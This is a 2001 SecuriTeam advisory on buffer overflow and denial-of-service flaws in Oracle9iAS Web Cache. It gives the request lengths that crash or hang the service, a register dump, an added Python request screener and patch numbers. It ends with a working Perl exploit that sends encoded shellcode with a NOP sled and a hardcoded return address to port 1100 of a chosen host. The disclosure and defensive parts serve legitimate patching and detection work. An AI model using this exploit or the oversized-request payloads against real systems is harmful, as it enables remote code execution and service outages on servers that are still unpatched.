[EXPL] Oracle9iAS Web Cache Multiple DoS and Buffer Overflow
From: support@securiteam.com
Date: 10/20/01
From: support@securiteam.com
To: list@securiteam.com
Subject: [EXPL] Oracle9iAS Web Cache Multiple DoS and Buffer Overflow
Message-Id: <20011020214551.5E3B1138C9@mail.der-keiler.de>
Date: Sat, 20 Oct 2001 23:45:51 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Oracle9iAS Web Cache Multiple DoS and Buffer Overflow
------------------------------------------------------------------------
SUMMARY
Oracle9iAS Release 2.0.0.1.0 (previous releases may also be affected)
contains a URL-driven buffer overrun condition that can cause the process
to exit, the process to hang, or injection of malicious code.
DETAILS
Vulnerable systems:
Oracle9iAS Web Cache version 2.0.0.1.0
A simple URL driven denial of service or buffer overflow condition occurs
when a very long text string is sent to the web service. This occurs on
all four web services that the Oracle9iAS Web Cache software provides. The
four services are by default run on:
Port 1100 = Incoming web cache proxy.
Port 4000 = Administrative interface.
Port 4001 = Web XML invalidation port.
Port 4002 = Statistics port.
Buffer overflow condition:
When sending a request containing / + 'A' x 3095 + 'N' x 4, the process
terminates with the following state dump (note that EBP holds the 'A'
bytes and EIP the 'N' bytes, i.e. the saved frame pointer and return
address were overwritten):
<....snip>
State Dump for Thread Id 0x104
eax=00000c1d ebx=00000000 ecx=00000c1d edx=026f0041
esi=01baac86 edi=0040deb6
eip=4e4e4e4e esp=0632fe08 ebp=41414141 iopl=0
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
efl=00000216
<snip....>
Denial of service:
Upon sending a string longer than 3570 characters, the process simply
exits without a stack dump:
'GET /<3571 x A> HTTP/1.0'
The following three denial of service attacks result in the process
hanging at 100% CPU usage. A reboot is required in order to terminate
the hanging processes:
- When sending a string containing approximately 3094 characters.
- When sending approximately 4000 or more characters in an HTTP header.
User-Agent is one of the verified headers where this condition exists.
'GET / HTTP/1.0'
'User-Agent: <4000 x A>'
- Sending the following request (this only affects the webcache admin
interface):
'GET /. HTTP/1.0'
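As an added defensive example (not part of the advisory or Oracle's software), a small Python screener that flags the request shapes described above so that a reverse proxy or IDS in front of the cache can log or drop them. The thresholds and the admin-port check come from the advisory text; the limits are set slightly below the reported trigger sizes, and the sample requests are constructed.

```python
import re

# Default Web Cache listener named in the advisory for the administrative interface.
ADMIN_PORT = 4000
# Advisory figures: ~3094-char target hangs, 3095+ overflows, 3571+ makes the process exit.
REQUEST_TARGET_LIMIT = 3000
# Advisory figure: ~4000-char header value (User-Agent verified) hangs the process.
HEADER_VALUE_LIMIT = 3500

# Request target is "anything but a space" so shellcode-like bytes still parse as a target.
REQUEST_LINE_RE = re.compile(r"^([A-Z]+) ([^ ]+) (HTTP/\d\.\d)$")


def screen_request(raw: bytes, dst_port: int) -> list:
    """Return a list of findings for one raw HTTP request head; an empty list means clean."""
    findings = []
    # Cut at the first blank line; the advisory's PoC sends bare "\n\n", real clients "\r\n\r\n".
    head = re.split(rb"\r?\n\r?\n", raw, maxsplit=1)[0]
    # Decode as latin-1 so every byte maps to one character and nothing raises.
    lines = [line.rstrip("\r") for line in head.decode("latin-1").split("\n")]
    match = REQUEST_LINE_RE.match(lines[0])
    if not match:
        return ["malformed request line"]
    _method, target, _version = match.groups()
    if len(target) > REQUEST_TARGET_LIMIT:
        findings.append(f"oversized request target ({len(target)} bytes)")
    if any(ord(c) < 0x20 or ord(c) > 0x7E for c in target):
        findings.append("non-printable bytes in request target")
    if dst_port == ADMIN_PORT and target == "/.":
        findings.append("'/.' request to admin interface (hang condition)")
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep:
            findings.append(f"malformed header line: {line[:40]!r}")
            continue
        if len(value.strip()) > HEADER_VALUE_LIMIT:
            findings.append(f"oversized header value: {name.strip()} ({len(value.strip())} bytes)")
    return findings


if __name__ == "__main__":
    # Constructed samples mirroring the advisory's three DoS cases and a clean request.
    samples = [
        (b"GET /index.html HTTP/1.0\r\nUser-Agent: curl\r\n\r\n", 1100),
        (b"GET /" + b"A" * 3571 + b" HTTP/1.0\n\n", 1100),
        (b"GET / HTTP/1.0\r\nUser-Agent: " + b"A" * 4000 + b"\r\n\r\n", 1100),
        (b"GET /. HTTP/1.0\r\n\r\n", 4000),
    ]
    for raw, port in samples:
        print(port, screen_request(raw, port))
```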
Workaround:
Download the patch from Oracle's support website, http://metalink.oracle.com
Windows NT or Windows 2000:
Patch number 2044682
SUN Sparc Solaris:
Patch number 2042106
HP-UX:
Patch number 2043908
Linux:
Patch number 2043924
Compaq Tru64 Unix:
Patch number 2043921
IBM AIX:
Patch number 2043917
Exploit:
####################################################################
#
# Proof-of-concept exploit for Oracle9iAS Web Cache/2.0.0.1.0
# Creates the file c:\defcom.iyd
# By andreas@defcom.com (C)2001
#
#
# Since we do not control the space after what ESP points to, I was lazy
# and did a direct buffer jump. So, if it does not work, try changing
# the return address(start of buffer in mem) to one that fits your system.
# The buffer starts at 0x05c5f1e8 on my box(WIN2K prof SP2).
# /andreas
#
####################################################################
$ARGC=@ARGV;
if ($ARGC !=1) {
print "Usage: $0 <host>\n";
print "Example: $0 127.0.0.1\n";
exit;
}
use Socket;
my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "1100"; # default port for the web cache
$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";
$sploit =
"\xeb\x03\x5a\xeb\x05\xe8\xf8\xff\xff\xff\x8b\xec\x8b\xc2\x83\xc0\x18\x33\xc9";
$sploit=$sploit .
"\x66\xb9\xb3\x80\x66\x81\xf1\x80\x80\x80\x30\x99\x40\xe2\xfa\xaa\x59";
$sploit=$sploit .
"\xf1\x19\x99\x99\x99\xf3\x9b\xc9\xc9\xf1\x99\x99\x99\x89\x1a\x5b\xa4";
$sploit=$sploit .
"\xcb\x27\x51\x99\xd5\x99\x66\x8f\xaa\x59\xc9\x27\x09\x98\xd5\x99\x66";
$sploit=$sploit .
"\x8f\xfa\xa3\xc5\xfd\xfc\xff\xfa\xf6\xf4\xb7\xf0\xe0\xfd\x99";
$msg = "GET " . $sploit . "\x90" x (3096 - length($sploit)) .
"\xe8\xf1\xc5\x05" . " HTTP/1.0\n\n";
print $msg;
send(SOCK, $msg, 0) or die "Cannot send query: $!";
sleep(1);
close(SOCK);
exit;
ADDITIONAL INFORMATION
The information has been provided by George Hedfors (george.hedfors@defcom.com)
and Andreas Junestam (andreas.junestam@defcom.com).